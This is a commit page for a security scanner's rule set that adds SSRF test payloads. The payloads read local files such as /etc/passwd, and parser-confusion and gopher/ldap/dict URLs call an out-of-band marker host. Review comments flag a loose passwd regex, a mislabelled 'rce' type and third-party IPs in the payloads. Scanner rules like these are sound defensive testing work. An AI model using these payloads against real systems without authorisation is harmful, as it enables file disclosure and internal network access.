Commit b71609d

Merge pull request #81 from 0x566164696D/rechecker-ssrf
new payloads for rechecker
2 parents 39002f4 + d08e0aa commit b71609d

2 files changed

+53
-0
lines changed

ssrf-rechecker-lfi.yaml

Lines changed: 21 additions & 0 deletions
@@ -0,0 +1,21 @@
1+
generate:
2+
- payload:
3+
- 'netdoc:///etc/passwd'
4+
- 'file:///etc/passwd'
5+
- 'file://c:\windows\system32\drivers\etc\networks'
6+
- method:
7+
- replace
8+
detect:
9+
- response:
10+
- body: '# campus 284.122.107'
11+
- body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
12+
meta-info:
13+
- type: rce
14+
- threat: 70
15+
- title: "Server Side Request Forgery (SSRF)"
16+
- description: "The target application may have functionality for importing data from a URL, publishing data to a URL or otherwise reading data from a URL that can be tampered with. The attacker modifies the calls to this functionality by supplying a completely different URL or by manipulating how URLs are built (path traversal, etc)."
17+
- applicable_for: ["attack_rechecker"]
18+
- tags:
19+
- SSRF
20+
- Server Side Request Forgery
21+
- CWE-918
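
Review bot: the passwd pattern on line 11 is unanchored and every field is quantified with `*`, so all of its fields may be empty and the rule can fire on a response body that contains only the colon and slash skeleton. Requiring non-empty numeric fields (`[0-9]+:[0-9]+` for uid and gid) would cut false positives, since a real passwd entry always carries both. Separately, line 13 sets `type: rce` while the title and tags on lines 15 and 18-21 describe SSRF (CWE-918) and the payloads on lines 3-5 read local files; if the rule schema offers a closer type, use it so that findings are triaged under the right class.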

ssrf-rechecker-oob.yaml

Lines changed: 32 additions & 0 deletions
@@ -0,0 +1,32 @@
1+
generate:
2+
- payload:
3+
- 'DNS_MARKER'
4+
- 'http://DNS_MARKER/'
5+
- 'http://DNS_MARKER &@2.2.2.2# @3.3.3.3/'
6+
- 'http://1.1.1.1 &@DNS_MARKER# @3.3.3.3/'
7+
- 'http://1.1.1.1 &@2.2.2.2# @DNS_MARKER/'
8+
- 'http://127.1.1.1:80\@DNS_MARKER:80/'
9+
- 'http://127.1.1.1:80\@@DNS_MARKER:80/'
10+
- 'http://127.1.1.1:80:\@@DNS_MARKER:80/'
11+
- 'http://127.1.1.1:80#\@DNS_MARKER:80/'
12+
- 'jar:http://DNS_MARKER!/'
13+
- 'dict://DNS_MARKER:11111/'
14+
- 'sftp://DNS_MARKER:8022/'
15+
- 'tftp://DNS_MARKER:69/somefile'
16+
- 'ldap://DNS_MARKER:389/%0astats%0aquit'
17+
- 'gopher://DNS_MARKER:70/'
18+
- method:
19+
- replace
20+
detect:
21+
- oob:
22+
- dns
23+
meta-info:
24+
- type: rce
25+
- threat: 70
26+
- title: "Server Side Request Forgery (SSRF)"
27+
- description: "The target application may have functionality for importing data from a URL, publishing data to a URL or otherwise reading data from a URL that can be tampered with. The attacker modifies the calls to this functionality by supplying a completely different URL or by manipulating how URLs are built (path traversal, etc)."
28+
- applicable_for: ["attack_rechecker"]
29+
- tags:
30+
- SSRF
31+
- Server Side Request Forgery
32+
- CWE-918
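
Review bot: lines 5-7 use `1.1.1.1`, `2.2.2.2` and `3.3.3.3` as the non-marker hosts, and these are routable addresses operated by third parties, so whenever the target's URL parser selects one of them instead of `DNS_MARKER` the rechecked application sends a request to a host outside the test. Addresses from the RFC 5737 documentation ranges (for example `192.0.2.1`) would keep the parser-confusion shape without that side effect. Line 24 also sets `type: rce` although the title and tags on lines 26 and 29-32 classify the finding as SSRF (CWE-918); the same mismatch appears in the other file and should be resolved the same way in both.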
